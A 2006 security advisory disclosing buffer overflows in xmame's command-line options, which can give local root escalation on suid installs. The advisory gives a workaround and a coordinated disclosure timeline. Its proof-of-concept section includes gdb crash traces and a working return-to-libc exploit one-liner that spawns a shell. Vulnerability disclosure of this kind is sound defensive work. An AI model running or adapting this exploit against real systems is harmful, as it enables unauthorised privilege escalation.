mysec.org Security Advisory : Xmame buffer overflow, with a possibility of privilege escalation Xmame buffer overflow, with a possibility of privilege escalation mysec.org Security Advisory 11 Jan 2006 http://www.mysec.org I. BACKGROUND Xmame and xmess are ports of MAME, the Multiple Arcade Machine Emulator and MESS, the Multi Emulator Super System. They run primarily on Linux and various flavors of UNIX, although some other operating systems, such as BeOS, are supported to some degree. II. DESCRIPTION Several functions in src/fileio.c and src/unix/fileio.c did not handle large input propely. These can cause buffer overflow. Most of the distros install xmame with suid root. There is a possibility for a local user to gain root privilege. Exploitation requires an attacker to send a specially constructed input for these few arguments. -lang -ctrlr -pb -rec For Ubuntu default installation, which is version 0.86 there is a option which infaceted. -jdev III. POC POC for -pb and -rec options , other options will be base on these info. ********* * -pb ********* (gdb) r -pb `ruby -e 'print "A" * 1034'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/games/xmame.x11 -pb `ruby -e 'print "A" * 1034'` (no debugging symbols found) ** More ** (no debugging symbols found) [Thread debugging using libthread_db enabled] [New Thread -1211603264 (LWP 8770)] DGA requires root rights Use of DGA-modes is disabled (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) (no debugging symbols found) info: trying to parse: /etc/xmame/xmamerc error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate, ignoring line info: trying to parse: /home/xwings/.xmame/xmamerc info: trying to parse: /etc/xmame/xmame-x11rc info: trying to parse: /home/xwings/.xmame/xmame-x11rc Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1211603264 (LWP 8770)] 0x41414141 in ?? () ********** * -rec ********** (gdb) r -rec `ruby -e 'print "A" * 1020'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/xwings/coding/sploit/xmame/xmame-0.102/xmame.x11 -rec `ruby -e 'print "A" * 1020'` (no debugging symbols found) ** More ** (no debugging symbols found) info: trying to parse: /usr/local/share/xmame/xmamerc info: trying to parse: /home/xwings/.xmame/xmamerc info: trying to parse: /usr/local/share/xmame/xmame-x11rc info: trying to parse: /home/xwings/.xmame/xmame-x11rc info: trying to parse: /usr/local/share/xmame/rc/robbyrc info: trying to parse: /home/xwings/.xmame/rc/robbyrc Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () ********************* * Successful Exploit ********************* Platform : Ubuntu Xmame Version : 0.102 - Selfcompile Exploit Method : Return to Libc xwings@pauillac.<xmame-0.102>$ ./xmame.x0 -pb `ruby -e 'print "\x90" * 1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'` info: trying to parse: /usr/local/share/xmame/xmamerc info: trying to parse: /home/xwings/.xmame/xmamerc info: trying to parse: /usr/local/share/xmame/xmame-x11rc info: trying to parse: /home/xwings/.xmame/xmame-x11rc sh-3.1$ IV. DETECTION mysec.org has confirmed this vulnerability on xmame 0.102. All previous versions are suspected vulnerable to this issue. V. WORKAROUND Disable SUID root for all the installed xmame. Do not run xmame.x11, xmame.sdl is recommended. VI. VENDOR RESPONSE Upgrade to CVS version. http://x.mame.net/download.html VIII. DISCLOSURE TIMELINE 1st Jan 2006, Initial vendor notification 2nd January 2006, Initial vendor response 11th January 2006, Vendor reply, bug fixed. 11th January 2006, Coordinated public disclosure IX. CREDIT Bug Founder : KaiJern, Lau Email : xwings <at> mysec <dot> org Thanks to all the folks pulltheplug.org.
